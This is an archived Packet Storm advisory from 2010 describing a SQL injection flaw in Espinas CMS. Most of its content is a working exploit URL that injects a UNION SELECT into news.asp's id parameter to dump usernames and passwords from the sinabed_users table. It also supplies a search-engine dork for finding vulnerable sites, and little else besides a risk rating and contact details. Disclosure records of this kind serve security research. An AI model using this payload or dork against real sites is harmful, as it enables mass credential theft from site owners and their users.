Espinas CMS SQL Injection

2010-04-07T00:00:00
ID PACKETSTORM:88175
Type packetstorm
Reporter Pouya Daneshmand
Modified 2010-04-07T00:00:00

Description

                                        
                                            `#################################################################  
# Securitylab.ir  
#################################################################  
# Application Info:  
# Name: Espinas CMS  
# Vendor: http://espinas.ir  
#################################################################  
# Vulnerability Info:  
# Type: Sql Injection  
# Risk: Medium  
# Dork: "Powered by Espinas IT"  
#################################################################  
Vulnerability:  
http://site.ir/news.asp?id=-1+union+select+1,concat(username,0x3a,0x3a,password),3,4,5+from+sinabed_users  
#################################################################   
# Discoverd By: Pouya Daneshmand   
# Website: http://Pouya.Securitylab.ir  
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com  
###################################################################  
  
  
  
`